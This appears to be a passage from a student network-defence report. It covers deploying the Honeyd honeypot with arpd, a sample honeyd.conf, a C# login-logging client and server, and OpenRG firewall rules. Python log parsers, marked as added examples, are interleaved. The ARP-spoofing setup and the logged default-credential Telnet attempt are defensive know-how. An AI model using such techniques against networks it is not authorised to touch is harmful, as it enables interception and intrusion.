Honeynets are clearly the riskiest of the honeypot solutions. Once an attacker gains access to a complete operating system, available in the honeynet, there are no limitations as to what they may be able to do to the system. They may use the system to compile code, communicate with other hackers, distribute tools, or launch attacks on other systems. The only thing restricting the hacker's activities is the access control device on the outside of the honeypots. Another concern is the complexity involved in configuring and maintaining a honeynet. Rules have to be established for all incoming and outgoing connections. System logs must capture all activity and forward it to a remote log server for review by the administrator. Any error in these configurations could expose the honeynet, its associated network and the administrator to increased risk. [24]


4.5.4 Our selection and work

We chose to install Honeyd on our network because it has the highest interaction among the low interaction honeypots. It has many features and is relatively simple to use. It has a Unix and a Windows version. Since it is open source, we can emulate our own services on it. The primary purpose of Honeyd is detection, specifically to detect unauthorized activity within an organization. It does this by monitoring all the unused IPs in a network. Any attempted connection to an unused IP address is assumed to be unauthorized or malicious activity. For example, if a network has a class C address, it is unlikely that every one of those 254 IP addresses is being used. Any connection attempted to one of those unused IP addresses is most likely a probe, a scan, or a worm hitting the network. Honeyd can monitor all of these unused IPs at the same time. Whenever a connection is attempted to one of them, Honeyd automatically assumes the identity of the unused IP address and then interacts with the attacker. This approach to detection has many advantages over traditional methods. Any time Honeyd generates an alert, it is most likely a real attack, not a false alarm. Honeyd also detects not only known attacks, but unknown ones as well. By default, Honeyd can detect (and log) any activity on any UDP or TCP port, as well as some ICMP activity. We can also create with Honeyd emulated services that interact with the attacker. These emulated services determine what the attacker is attempting to do and what they are looking for. We do this by creating scripts that listen on specific ports and then interact with attackers in a predetermined manner. For example, we can create an FTP script that emulates a wu-ftpd daemon on Linux, or a Telnet connection on a Cisco router. These emulated services are limited because they act in a predetermined way. The script can be written in almost any language, such as Perl, Shell, or Expect. Below is an example of a service emulating a Cisco router.

    attacker$ telnet 192.168.1.150
    Trying 192.168.1.150...

    Users (authorized or unauthorized) have no explicit or
    implicit expectation of privacy. Any or all uses of this
    system may be intercepted, monitored, recorded, copied,
    audited, inspected, and disclosed to authorized site,
    and law enforcement personnel, as well as to authorized
    officials of other agencies, both domestic and foreign.
    By using this system, the user consents to such
    interception, monitoring, recording, copying, auditing,
    inspection, and disclosure at the discretion of authorized
    site.

    Unauthorized or improper use of this system may result in
    administrative disciplinary action and civil and criminal
    penalties. By continuing to use this system you indicate
    your awareness of and consent to these terms and conditions
    of use. LOG OFF IMMEDIATELY if you do not agree to the
    conditions stated in this warning.

    User Access Verification

    Username: cisco
    Password:
    % Access denied

The honeyd log of the attack would look like this:

    Jan 3 11:23:32 marge honeyd[22885]: Connection request: (192.168.1.10:2783 - 192.168.1.150:23)
    Jan 3 11:23:32 marge honeyd[22885]: Connection established:(192.168.1.10:2783 - 192.168.1.150:23) <-> /usr/bin/perl scripts/router-telnet.pl
    Jan 3 11:23:42 marge honeyd[22885]: E(192.168.1.10:2783 - 192.168.1.150:23): Attempted login: cisco/cisco
    Jan 3 11:23:47 marge honeyd[22885]: Connection dropped with reset: (192.168.1.10:2783 - 192.168.1.150:23)
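The log above is what Honeyd records for a single probe against one emulated address. As an added example (not code from the report or from the Honeyd project), the Python script below parses lines in that format and summarises them per source address, so that a source touching several honeypot addresses in a row stands out as a scan rather than a one-off probe. The first four sample lines are the report's own output; the lines for 192.168.1.77 are constructed, and the function names are this example's own.

```python
"""Summarise Honeyd connection-log lines per source host.

Added example: not code from the report or from the Honeyd project. The first
four sample lines are the report's own log output; the lines for 192.168.1.77
are constructed to show what a scan across several unused addresses looks like.
Function names are this example's.
"""
import re
from collections import defaultdict

SAMPLE_LOG = """\
Jan 3 11:23:32 marge honeyd[22885]: Connection request: (192.168.1.10:2783 - 192.168.1.150:23)
Jan 3 11:23:32 marge honeyd[22885]: Connection established:(192.168.1.10:2783 - 192.168.1.150:23) <-> /usr/bin/perl scripts/router-telnet.pl
Jan 3 11:23:42 marge honeyd[22885]: E(192.168.1.10:2783 - 192.168.1.150:23): Attempted login: cisco/cisco
Jan 3 11:23:47 marge honeyd[22885]: Connection dropped with reset: (192.168.1.10:2783 - 192.168.1.150:23)
Jan 3 11:25:01 marge honeyd[22885]: Connection request: (192.168.1.77:40001 - 192.168.1.200:80)
Jan 3 11:25:01 marge honeyd[22885]: Connection request: (192.168.1.77:40002 - 192.168.1.201:80)
Jan 3 11:25:02 marge honeyd[22885]: Connection request: (192.168.1.77:40003 - 192.168.1.202:80)
"""

# Every connection-related line carries "(src:sport - dst:dport)".
ENDPOINTS = re.compile(r"\((\d+\.\d+\.\d+\.\d+):(\d+) - (\d+\.\d+\.\d+\.\d+):(\d+)\)")
LOGIN = re.compile(r"Attempted login: (\S+)")


def parse_line(line):
    """Return a dict for one connection-related line, or None for anything else."""
    m = ENDPOINTS.search(line)
    if not m:
        return None
    body = line.partition("]: ")[2]          # text after "honeyd[pid]: "
    if body.startswith("Connection request"):
        kind = "request"
    elif body.startswith("Connection established"):
        kind = "established"
    elif body.startswith("Connection dropped"):
        kind = "dropped"
    elif body.startswith("E("):
        kind = "service"                      # output relayed from an emulated service script
    else:
        kind = "other"
    login = LOGIN.search(body)
    return {"time": " ".join(line.split()[:3]),
            "src": m.group(1), "sport": int(m.group(2)),
            "dst": m.group(3), "dport": int(m.group(4)),
            "kind": kind, "login": login.group(1) if login else None}


def summarize(log_text):
    """Per source address: honeypot addresses and ports requested, and credentials tried."""
    per_src = defaultdict(lambda: {"targets": set(), "ports": set(), "logins": []})
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        entry = per_src[ev["src"]]
        if ev["kind"] == "request":
            entry["targets"].add(ev["dst"])
            entry["ports"].add(ev["dport"])
        if ev["login"]:
            entry["logins"].append(ev["login"])
    return dict(per_src)


def classify(summary, scan_threshold=3):
    """Any hit on an unused address is suspect; a source that requests connections to
    scan_threshold or more distinct honeypot addresses is labelled a scan, the rest a probe."""
    return {src: "scan" if len(info["targets"]) >= scan_threshold else "probe"
            for src, info in summary.items()}


if __name__ == "__main__":
    summary = summarize(SAMPLE_LOG)
    for src, label in classify(summary).items():
        print(src, label, sorted(summary[src]["targets"]), summary[src]["logins"])
```

The threshold is a parameter because the right value depends on how much unused space the honeypot covers; on a sparsely used /24, even two distinct honeypot addresses from one source in a short window is worth an alert.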

To implement Honeyd we need to compile and use two tools: Arpd and Honeyd. Honeyd cannot do everything alone and requires the help of Arpd. Arpd is used for ARP spoofing; this is what actually monitors the unused IP space and directs attacks to the Honeyd honeypot. Honeyd does not have the capability to direct attacks to itself; it only has the capability to interact with attackers. The commands to start both are listed below. The networks in the code below are the networks that Arpd will monitor and Honeyd will interact with. In this example, the honeypot monitors all unused IP space in the 192.168.1.0/24 network.

    arpd 192.168.1.0/24
    honeyd -p nmap.prints -f honeyd.conf 192.168.1.0/24


So, based on the commands above, the Arpd process will monitor any unused IP space on the 192.168.1.0/24 network. If it sees any packets going to unused IPs, it will direct those packets to the Honeyd honeypot using ARP spoofing, a layer two attack: it answers ARP requests for the victim's IP address with the MAC address of the honeypot. For the Honeyd command, -p nmap.prints refers to the Nmap fingerprint database. This is the actual database that the scanning tool Nmap uses to fingerprint operating systems. We can get the latest Nmap fingerprint database from Nmap. The second option for the Honeyd process, -f honeyd.conf, is the honeypot configuration file. This determines how we want the honeypot to behave.

    ## Honeyd configuration file ##

    ### Windows computers (default)
    create default
    set default personality "Windows NT 4.0 Server SP5-SP6"
    set default default tcp action reset
    add default tcp port 110 "sh scripts/pop.sh"
    add default tcp port 80 "perl scripts/iis-0.95/main.pl"
    add default tcp port 25 block
    add default tcp port 21 "sh scripts/ftp.sh"
    add default tcp port 22 proxy $ipsrc:22
    add default udp port 139 drop
    set default uptime 3284460

    ### Cisco router
    create router
    set router personality "Cisco 4500-M running IOS 11.3(6) IP Plus"
    add router tcp port 23 "/usr/bin/perl scripts/router-telnet.pl"
    set router default tcp action reset
    set router uid 32767 gid 32767
    set router uptime 1327650

    # Bind specific templates to specific IP address
    # If not bound, default to Windows template
    bind 192.168.1.150 router

We start off by creating the different types of computers we want to emulate (templates). These templates define the behavior of each emulated operating system. In this configuration file we have created two different emulated computers: default and router. The first thing we need to do in each template is assign the "personality"; this is the operating system Honeyd will emulate at the IP stack level. We give it the OS type using the same description as in the Nmap fingerprint database. In the above example, for the template default, we have assigned the personality "Windows NT 4.0 Server SP5-SP6", and for the template router we have given it the personality "Cisco 4500-M running IOS 11.3(6) IP Plus". Note that the personality does not affect the behavior of the emulated services; it only modifies the behavior of the IP stack. For the emulated services, we have to select different scripts based on what type of OS we want to emulate. If our personality is Windows, it is not sensible to bind an emulated Apache script to the HTTP port. Instead, we would bind an emulated IIS script to the HTTP port.

The next step is to define the behavior of each port. We can either assign specific ports specific behavior, or define general behavior. In the above example, in the template default all the TCP ports are assigned the behavior reset, so they respond with a RST to any connection attempt (for UDP, an ICMP port unreachable). Other options are open (will respond with an ACK, or for UDP nothing) or block (will not respond, for both TCP and UDP).

Once we have created our templates, we have to decide which IP addresses are bound to which template. Using the bind command, as we do for the router template, we can bind a template to specific IP addresses. In this case, if anyone attempts to connect to IP address 192.168.1.150, they will be interacting with the Honeyd honeypot using the router template. The default template is a key template for Honeyd. The template with the name default becomes the default for all other connections to unused IP space. So if any connections are made to any unused IP space in the 192.168.1.0/24 network, they will get a Windows box emulated by Honeyd, except for the IP 192.168.1.150, at which they will get the Cisco router.
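To make the template and bind semantics concrete, the following Python program (an added example, not code from the report or from the Honeyd project) parses the subset of honeyd.conf directives used above and answers, for a destination address, protocol and port, which template Honeyd would use, which personality it presents, and which action or script handles the port. The configuration text is the report's own; the function names are this example's, and any "set" directive the parser does not know (uid/gid, uptime) is kept as raw tokens rather than rejected.

```python
"""Resolve which Honeyd template, personality and port action apply to a destination.

Added example: not code from the report or from the Honeyd project. It parses
the subset of honeyd.conf directives used in the report (create, set ...
personality, set ... default <proto> action, add ... <proto> port, bind) and
keeps any other "set" directive as raw tokens. Function names are this example's.
"""
import shlex

# The report's own configuration file, embedded so the example runs offline.
HONEYD_CONF = """\
## Honeyd configuration file ##
### Windows computers (default)
create default
set default personality "Windows NT 4.0 Server SP5-SP6"
set default default tcp action reset
add default tcp port 110 "sh scripts/pop.sh"
add default tcp port 80 "perl scripts/iis-0.95/main.pl"
add default tcp port 25 block
add default tcp port 21 "sh scripts/ftp.sh"
add default tcp port 22 proxy $ipsrc:22
add default udp port 139 drop
set default uptime 3284460
### Cisco router
create router
set router personality "Cisco 4500-M running IOS 11.3(6) IP Plus"
add router tcp port 23 "/usr/bin/perl scripts/router-telnet.pl"
set router default tcp action reset
set router uid 32767 gid 32767
set router uptime 1327650
# Bind specific templates to specific IP address
# If not bound, default to Windows template
bind 192.168.1.150 router
"""

BUILTIN_ACTIONS = {"open", "reset", "block", "drop"}


def new_template(name):
    return {"name": name, "personality": None, "defaults": {}, "ports": {}, "other": {}}


def parse_config(text):
    """Return {"templates": {name: template}, "bindings": {ip: template name}}."""
    templates, bindings = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tok = shlex.split(line)             # honours the quoted script commands
        if tok[0] == "create":
            templates[tok[1]] = new_template(tok[1])
        elif tok[0] == "set":
            t = templates[tok[1]]
            if tok[2] == "personality":
                t["personality"] = tok[3]
            elif tok[2] == "default":       # set <tpl> default <proto> action <action>
                t["defaults"][tok[3]] = tok[5]
            else:                           # uid/gid, uptime, ...: kept verbatim
                t["other"][tok[2]] = tok[3:]
        elif tok[0] == "add":               # add <tpl> <proto> port <n> <action or script>
            templates[tok[1]]["ports"][(tok[2], int(tok[4]))] = " ".join(tok[5:])
        elif tok[0] == "bind":
            bindings[tok[1]] = tok[2]
        else:
            raise ValueError("unsupported directive: " + line)
    return {"templates": templates, "bindings": bindings}


def action_kind(action):
    """Classify a port action: built-in stack behaviour, proxy, or an external service script."""
    if action is None:
        return "unspecified"
    if action in BUILTIN_ACTIONS:
        return "builtin"
    if action.startswith("proxy "):
        return "proxy"
    return "script"


def resolve(cfg, dst_ip, proto, port):
    """Return (template name, personality, action) for a packet to dst_ip:port/proto.

    A bound address uses its bound template; every other address falls back to the
    template literally named "default". A port-specific entry wins over the
    template's per-protocol default action; with neither, the action is None.
    """
    name = cfg["bindings"].get(dst_ip, "default")
    t = cfg["templates"].get(name)
    if t is None:
        return (None, None, None)
    action = t["ports"].get((proto, port), t["defaults"].get(proto))
    return (t["name"], t["personality"], action)


if __name__ == "__main__":
    cfg = parse_config(HONEYD_CONF)
    for ip, proto, port in [("192.168.1.150", "tcp", 23), ("192.168.1.37", "tcp", 80)]:
        tpl, pers, act = resolve(cfg, ip, proto, port)
        print(ip, port, proto, "->", tpl, repr(pers), repr(act), action_kind(act))
```

Running the resolver over a few addresses before starting Honeyd is a cheap way to catch the mistake the text warns about (an IIS script on a Windows personality is fine, an Apache script on it is not) and to notice protocols with no default action at all, such as UDP in the report's configuration.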

During our implementation of the above mentioned procedures we faced some difficulties. First of all, nmap was not installed on the Fedora workstations, so we had to install it. Second, we had to get some missing libraries in order to compile Honeyd (libevent, an asynchronous event library; libdnet, the network library; libpcap, a packet capture library).

4.6 User Logs

In order to monitor the users logging on to the network we decided to write a program that records and stores all the logins and logouts of all users with their respective times and dates. This software is written in C#.NET and will help us trace an internal attack to the user behind it, by checking the application for the last logged in user. Instead of reading the logs from the standard Windows log file, which is susceptible to change by any novice internal attacker, we used the “System.Security.Principal” library in order to get the username and domain of each logged in user. The general idea of the code is to obtain the username, domain and clock time from the system and send them through sockets to the server, where they are stored in a file and are ready for display.

The software consists of two applications: the server application and the client application.

Client application:

The task of this application is to get the username and domain and send them to the server application.

The libraries used in this application to provide us with the necessary tools were “System.Security.Principal”, “System.Net” and “System.Net.Sockets”.

“System.Security.Principal”: This library was useful because it contains the WindowsIdentity class, which in turn contains the GetCurrent() function used for getting the username and domain. The function's use is illustrated in the code below:

    WindowsIdentity user = WindowsIdentity.GetCurrent();
    byte[] byData = System.Text.Encoding.ASCII.GetBytes(user.Name.ToString() + " " + user.User.ToString() + " " + DateTime.Now.ToString());
    socClient.Send(byData);

“System.Net”: This library allows us to specify the destination IP addresses and endpoints and to specify the protocol type.

“System.Net.Sockets”: This library is used to create new sockets through which the data “byData” is sent to the destination IP.


    class SocketPkt
    {
        public System.Net.Sockets.Socket socket;
        public byte[] dataBuffer = new byte[1024];
    }

Full Client Application Code:

    using System;
    using System.Collections.Generic;
    using System.ComponentModel;
    using System.Data;
    using System.Drawing;
    using System.Text;
    using System.Windows.Forms;
    using System.Net;
    using System.Net.Sockets;
    using System.Security.Principal;

    namespace TestClient
    {
        public partial class MainForm : Form
        {
            private Socket socClient;
            private string serverIP = "192.168.1.101";
            private int serverPort = 54323;
            private IAsyncResult asynResult;
            public AsyncCallback fnCallBack = null;

            public MainForm()
            {
                InitializeComponent();
                try
                {
                    socClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                    // The original listing referenced an undefined "serveIP" here; it must be serverIP.
                    IPAddress ipAdd = IPAddress.Parse(serverIP);
                    IPEndPoint serverEP = new IPEndPoint(ipAdd, serverPort);
                    socClient.Connect(serverEP);
                    WaitForData();
                }
                catch (SocketException se)
                {
                    MessageBox.Show(se.Message, "Unable to Connect to Server");
                }
                // Report the login as soon as the form (started at logon) comes up.
                try
                {
                    WindowsIdentity user = WindowsIdentity.GetCurrent();
                    byte[] byData = System.Text.Encoding.ASCII.GetBytes(Environment.NewLine + "*UserName: "
                        + user.Name.ToString() + " " + "Login Time: " + " " + DateTime.Now.ToString());
                    socClient.Send(byData);
                }
                catch { }
            }

            public void WaitForData()
            {
                if (fnCallBack == null)
                {
                    fnCallBack = new AsyncCallback(OnDataReceived);
                }
                SocketPkt socketPkt = new SocketPkt();
                socketPkt.socket = socClient;
                asynResult = socClient.BeginReceive(socketPkt.dataBuffer, 0, socketPkt.dataBuffer.Length,
                    SocketFlags.None, fnCallBack, socketPkt);
            }

            public void OnDataReceived(IAsyncResult asyn)
            {
                try
                {
                    SocketPkt socketPkt = (SocketPkt)asyn.AsyncState;
                    int iRx = 0;
                    iRx = socketPkt.socket.EndReceive(asyn);
                    char[] chars = new char[iRx + 1];
                    Decoder d = Encoding.UTF8.GetDecoder();
                    int charLen = d.GetChars(socketPkt.dataBuffer, 0, iRx, chars, 0);
                    string strData = new string(chars);
                    parseReceivedData(socketPkt.socket, strData);
                    WaitForData();
                }
                catch (ObjectDisposedException)
                {
                    System.Diagnostics.Debugger.Log(0, "1", "\nOnDataReceived: Socket has been closed\n");
                }
                catch (SocketException se)
                {
                    MessageBox.Show(se.Message);
                }
            }

            // The server never sends anything back; this hook is kept for future use.
            private void parseReceivedData(Socket socket, string data)
            {
                //String szData = "Again";
                //byte[] byData = System.Text.Encoding.ASCII.GetBytes(szData);
                //socClient.Send(byData);
            }

            private void btnConnect_Click(object sender, EventArgs e)
            {
                try
                {
                    socClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                    IPAddress ipAdd = IPAddress.Parse(serverIP);
                    IPEndPoint serverEP = new IPEndPoint(ipAdd, serverPort);
                    socClient.Connect(serverEP);
                    WaitForData();
                }
                catch (SocketException se)
                {
                    MessageBox.Show(se.Message, "Unable to Connect to Server");
                }
            }

            private void btnClose_Click(object sender, EventArgs e)
            {
                socClient.Disconnect(false);
                socClient.Close();
            }

            private void btnSend_Click(object sender, EventArgs e)
            {
                WindowsIdentity user = WindowsIdentity.GetCurrent();
                byte[] byData = System.Text.Encoding.ASCII.GetBytes(user.Name.ToString() + " "
                    + user.User.ToString() + " " + DateTime.Now.ToString());
                socClient.Send(byData);
            }

            // The logout record is only sent when Windows itself is shutting down.
            private void MainForm_FormClosed(object sender, FormClosedEventArgs e)
            {
                try
                {
                    if (e.CloseReason == CloseReason.WindowsShutDown)
                    {
                        WindowsIdentity user = WindowsIdentity.GetCurrent();
                        byte[] byData = System.Text.Encoding.ASCII.GetBytes("UserName: " + user.Name.ToString()
                            + " " + "Logout Time :" + " " + DateTime.Now.ToString());
                        socClient.Send(byData);
                    }
                }
                catch { }
            }
        }
    }


Server Application:

The task of this application is to receive the data sent by the client application over TCP/IP, store this data into a log file and display it at the user's will.

The libraries used in this application to provide us with the necessary tools were “System.Net”, “System.IO” and “System.Net.Sockets”.

“System.Net”: This library allows us to specify the destination IP addresses and endpoints and to specify the protocol type.

“System.Net.Sockets”: This library is used to create new sockets, through which each logged in user is assigned a socket of his own.

    class SocketPkt
    {
        public System.Net.Sockets.Socket socket;
        public byte[] dataBuffer = new byte[1024];
        public bool isActive = false;
    }

“System.IO”: Used to stream read and write from and onto files.

    StreamReader sr = new StreamReader("C:\\Log.txt", Encoding.ASCII);

Server Application Output Format: (Figure 4.7)


N.B. The clear button clears the display but the Log file remains intact.

Full Server Application Code:

    using System;
    using System.Collections.Generic;
    using System.ComponentModel;
    using System.Data;
    using System.Drawing;
    using System.Text;
    using System.Windows.Forms;
    using System.Net.Sockets;
    using System.Net;
    using System.IO;

    namespace Server_akiki
    {
        public partial class Server : Form
        {
            private Socket socListener = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
            private int serverPort = 54323;
            static private int maxConnections = 1000;
            private SocketPkt[] clientSocket = new SocketPkt[maxConnections];
            private AsyncCallback fnCallBack = null;
            private IAsyncResult asynResult;

            public Server()
            {
                InitializeComponent();
                FillList();
                for (int i = 0; i < maxConnections; i++)
                {
                    clientSocket[i] = new SocketPkt();
                }
                Start();
            }

            // Load the records already in the log file into the list box at startup.
            private void FillList()
            {
                StreamReader sr = new StreamReader("C:\\Log.txt", Encoding.ASCII);
                while (!sr.EndOfStream)
                {
                    string x = sr.ReadLine();
                    if (x != "")
                        LogList.Items.Add(x);
                }
                sr.Close();
            }

            //private void Start_Click(object sender, EventArgs e)
            //{
            //    for (int i = 0; i < maxConnections; i++)
            //    {
            //        clientSocket[i] = new SocketPkt();
            //    }
            //    Start();
            //}

            private void Start()
            {
                try
                {
                    IPEndPoint ipLocal = new IPEndPoint(IPAddress.Any, serverPort);
                    socListener.Bind(ipLocal);
                    socListener.Listen(maxConnections);
                    socListener.BeginAccept(new AsyncCallback(OnClientConnect), null);
                }
                catch (SocketException se)
                {
                    Console.Write(se.Message);
                }
            }

            public void OnDataReceived(IAsyncResult asyn)
            {
                int idx = (int)asyn.AsyncState;
                try
                {
                    int iRx = 0;
                    iRx = clientSocket[idx].socket.EndReceive(asyn);
                    if (iRx == 0)
                    {
                        // Zero bytes means the client closed the connection: free the slot
                        // instead of re-arming BeginReceive in a tight loop (added guard).
                        clientSocket[idx].socket.Close();
                        clientSocket[idx].isActive = false;
                        return;
                    }
                    char[] chars = new char[iRx + 1];
                    Decoder d = Encoding.UTF8.GetDecoder();
                    int charLen = d.GetChars(clientSocket[idx].dataBuffer, 0, iRx, chars, 0);
                    string strData = new string(chars);
                    if (strData.EndsWith("\0"))
                        strData = strData.Substring(0, strData.Length - 1);
                    WriteDataToFile(strData);
                    WaitForData(idx);
                }
                catch (ObjectDisposedException)
                {
                    System.Diagnostics.Debugger.Log(0, "1", "\nOnDataReceived: Socket has been closed\n");
                }
                catch (SocketException se)
                {
                    if (clientSocket[idx].socket.Connected)
                    {
                        Console.Write("OnDataReceived: " + se.Message);
                    }
                    else
                    {
                        clientSocket[idx].isActive = false;
                    }
                }
            }

            private void WriteDataToFile(string strData)
            {
                // Socket callbacks run on a thread-pool thread, and WinForms controls may only
                // be touched from the UI thread, so marshal the call over first (added fix).
                if (LogList.InvokeRequired)
                {
                    LogList.BeginInvoke(new Action<string>(WriteDataToFile), strData);
                    return;
                }
                LogList.Items.Add(strData);
                LogList.Refresh();
                try
                {
                    StreamWriter swr = new StreamWriter("C:\\Log.txt", true, Encoding.ASCII);
                    swr.WriteLine(strData + "\n");
                    swr.Close();
                }
                catch (Exception ex)
                {
                    MessageBox.Show(ex.ToString());
                }
            }

            public void WaitForData(int idx)
            {
                if (fnCallBack == null)
                {
                    fnCallBack = new AsyncCallback(OnDataReceived);
                }
                asynResult = clientSocket[idx].socket.BeginReceive(clientSocket[idx].dataBuffer, 0,
                    clientSocket[idx].dataBuffer.Length, SocketFlags.None, fnCallBack, idx);
            }

            public void OnClientConnect(IAsyncResult asyn)
            {
                try
                {
                    int idx = getFirstInactive();
                    if (idx < 0)
                    {
                        // Every slot is in use: refuse this client rather than indexing
                        // clientSocket[-1], and keep accepting (added guard).
                        socListener.EndAccept(asyn).Close();
                        socListener.BeginAccept(new AsyncCallback(OnClientConnect), null);
                        return;
                    }
                    clientSocket[idx].socket = socListener.EndAccept(asyn);
                    clientSocket[idx].isActive = true;
                    socListener.BeginAccept(new AsyncCallback(OnClientConnect), null);
                    WaitForData(idx);
                }
                catch (ObjectDisposedException)
                {
                    System.Diagnostics.Debugger.Log(0, "1", "\n OnClientConnection: Socket has been closed\n");
                }
                catch (SocketException se)
                {
                    Console.Write("OnClientConnect: " + se.Message);
                }
            }

            // Returns the first free slot, or -1 when all maxConnections slots are active.
            private int getFirstInactive()
            {
                for (int i = 0; i < maxConnections; i++)
                {
                    if (!clientSocket[i].isActive)
                    {
                        return i;
                    }
                }
                return -1;
            }

            private void sendData(int socketIdx, string strData)
            {
                byte[] byData = System.Text.Encoding.ASCII.GetBytes(strData);
                clientSocket[socketIdx].socket.Send(byData);
            }

            public void BroadCastData(string strData, string Quote)
            {
            }

            // Clears the selection if there is one, otherwise the whole display; the file is untouched.
            private void Clear_Click(object sender, EventArgs e)
            {
                if (LogList.SelectedItems.Count != 0)
                    LogList.ClearSelected();
                else
                    LogList.Items.Clear();
            }
        }
    }
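The server above appends whatever record a client sends to C:\Log.txt, and the stated purpose of the tool is to find the account behind an internal incident. As an added example, not part of the report's C# code, the Python script below reads records in the client's two formats, rejects lines that do not match them, rebuilds per-account sessions, and answers which accounts were logged in at a given moment. The sample records are constructed; the code assumes DateTime.Now.ToString() produced the en-US "M/d/yyyy h:mm:ss tt" form, and the function names are this example's own.

```python
"""Rebuild login sessions from the user-log file written by the server application.

Added example, not part of the report's C# code. It reads the two record
formats the client sends ("*UserName: <user> Login Time:  <clock time>" and
"UserName: <user> Logout Time : <clock time>"), which the server appends to
C:\\Log.txt one per line, rejects anything else, and answers which account
was logged in at a given moment. Sample records are constructed; the clock
time is assumed to be DateTime.Now.ToString() in the en-US form
"M/d/yyyy h:mm:ss tt".
"""
import re
from datetime import datetime

SAMPLE_LOG = """\
*UserName: LAB\\akiki Login Time:  5/2/2006 9:03:11 AM

UserName: LAB\\akiki Logout Time : 5/2/2006 11:47:05 AM

*UserName: LAB\\chaoul Login Time:  5/2/2006 11:52:40 AM

this is not a log record
*UserName: LAB\\moukarzel Login Time:  5/2/2006 1:15:02 PM
"""

# Accept only the exact shapes the client produces; the server itself writes
# whatever bytes arrive on the socket, so validation has to happen here.
RECORD = re.compile(r"^\*?UserName: (?P<user>\S+) (?P<event>Login|Logout) Time\s*:\s*(?P<when>.+)$")
TIME_FMT = "%m/%d/%Y %I:%M:%S %p"


def parse_records(text):
    """Return (events, rejected); events are (time, account, 'login'|'logout') sorted by time."""
    events, rejected = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = RECORD.match(line)
        if not m:
            rejected.append(line)
            continue
        try:
            when = datetime.strptime(m.group("when").strip(), TIME_FMT)
        except ValueError:
            rejected.append(line)
            continue
        events.append((when, m.group("user"), m.group("event").lower()))
    events.sort()
    return events, rejected


def sessions(events):
    """Pair each login with the next logout of the same account.

    A session with no logout record keeps end=None and counts as still open:
    the client only reports a logout when Windows itself shuts down, so a
    crash or a pulled cable leaves no closing record.
    """
    open_since, result = {}, []
    for when, user, kind in events:
        if kind == "login":
            if user in open_since:                      # second login with no logout between
                result.append((user, open_since.pop(user), None))
            open_since[user] = when
        elif user in open_since:
            result.append((user, open_since.pop(user), when))
    for user, start in open_since.items():
        result.append((user, start, None))
    return sorted(result, key=lambda s: s[1])


def logged_in_at(sess, moment):
    """Accounts whose session covers `moment` (a datetime or a string in TIME_FMT)."""
    if isinstance(moment, str):
        moment = datetime.strptime(moment, TIME_FMT)
    return sorted(user for user, start, end in sess
                  if start <= moment and (end is None or moment < end))


if __name__ == "__main__":
    events, rejected = parse_records(SAMPLE_LOG)
    print("rejected:", rejected)
    print("logged in at 1:30 PM:", logged_in_at(sessions(events), "5/2/2006 1:30:00 PM"))
```

The rejected list is worth reviewing rather than discarding: since the server accepts any TCP client on port 54323 and writes its bytes verbatim, a line that matches neither format is either a client bug or someone other than the client writing to the log.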

5. Countering the Attacks

Now that the network was ready and secured, it was time to counter the attacks performed by the hackers’ team. They started attacking externally, and they were then given a user account to attack internally.

5.1 First Attack

The first attack was performed in the first week of May. None of our scanners and event alarms pinpointed it, but we discovered what had been done by social engineering (some colleagues were assisting the hackers’ team, and told us about the attack).

When the hackers could not log in from the outside (due to firewall security), they plugged their computer into one of our switch’s ports, i.e. on the internal network, and performed an extensive scan.

Although such an attack was not meant to happen, as it did not follow some pre-set guidelines, we still searched for a way to prevent it.

We decided that the best way to keep out non-users is to prevent foreign MAC/IP addresses from accessing the network, from without or within. Our firewall does not support software platforms, but higher-caliber routers (such as the 10/100 4-Port VPN Router (RV042)) can accommodate platforms like OpenRG, which allows you to manually configure your firewall. After downloading this software onto the router you will not only have a secure and sophisticated firewall, but you will also have control over your internal LAN IPs and MAC addresses. Before going deep into the calibration of a firewall we will give a general view of the firewall mechanism, the firewall rules and the firewall chains, and then give an example of each of the last two.

Firewall Mechanism

The firewall configuration is a set of:

• Firewall rules (rule set)
• Firewall active devices
• Firewall configuration flags

The firewall rule set is a set of firewall rules, represented as firewall opcodes that the kernel (data-path module) executes for each packet that traverses the firewall.

The rules come from:

• The user, through the different tabs of the security screen.
• The user, when configuring general definitions that affect the firewall, for example changing the security level (High/Typical/Maximum), adding the firewall to or removing it from a device, or changing the route level of a device (NAT/NAPT/ROUTE).
• Tasks that need a port opened in the firewall, such as the PPTP or IPsec servers.
• The firewall itself, to block packets that are a security hazard.

The firewall rules can be roughly divided into three categories:

1. Rules that are configured in the Firewall Rules format and saved in that format. This format is used by the "Advanced Filtering" feature to insert generic firewall rules.
2. Rules that belong to the firewall features. These rules are controlled by the various tabs of the security screen and have their own format.
3. Implicit rules that are part of the network devices' configuration, for example the security level (Minimum/Typical/High) or the Internet Connection Firewall check box in a Connection Settings screen.

Firewall Rule

A firewall rule is a generic API for controlling the firewall operation, providing full control of matching and filtering. It is also the firewall's external interface for tasks that wish to configure firewall rules. Each firewall rule consists of a match section and an action section. When a packet arrives at the firewall it is checked against the match section; if it passes the criteria there, the rule's action is taken. For example, take this advanced filtering rule:

(rule
    (0
        (enabled(1))
        (match
            (ip_src_start(212.1.1.8))
            (ip_src_end(212.1.1.233))
            (ip_dst_start(0.0.0.0))
            (ip_dst_end(255.255.255.255))
        )
        (action
            (type(accept))
            (log(1))
        )
    )
)

The match section matches packets whose source IP is in the range 212.1.1.8-212.1.1.233, whatever their destination. If the packet is matched, the action is to accept the packet and generate a log message.

The important firewall actions are:

• Drop - drops the packet.
• Reject - drops the packet and sends an ICMP error or a TCP reset to the originating peer.
• Accept - accepts the packet (stateful: a connection entry is created).
• Accept Packet - accepts the packet (stateless).
• Accept-NAT - for outbound packets: accepts the packet and NATs the source IP address.
• Accept-Redirect - for inbound packets: accepts the packet and NATs the destination address (this action is also known as DNAT or RNAT).
• Log - generates a log message.
• Call - calls a chain (see below).

Firewall Chain

A chain in the firewall is a list of rules that are executed sequentially, one after the other. Chains let you build a more complex and better-optimized rule set. For example, the core chains of the firewall are the inbound chain, which is called for inbound packets only, and the outbound chain, which is called for outbound packets only. The flow of a packet through the chains is controlled by rules whose action is Call. A good example of the use of chains is the firewall GUI, which gives you an interface to fill in several chains:

• Initial inbound: first rules executed by the firewall for inbound packets.
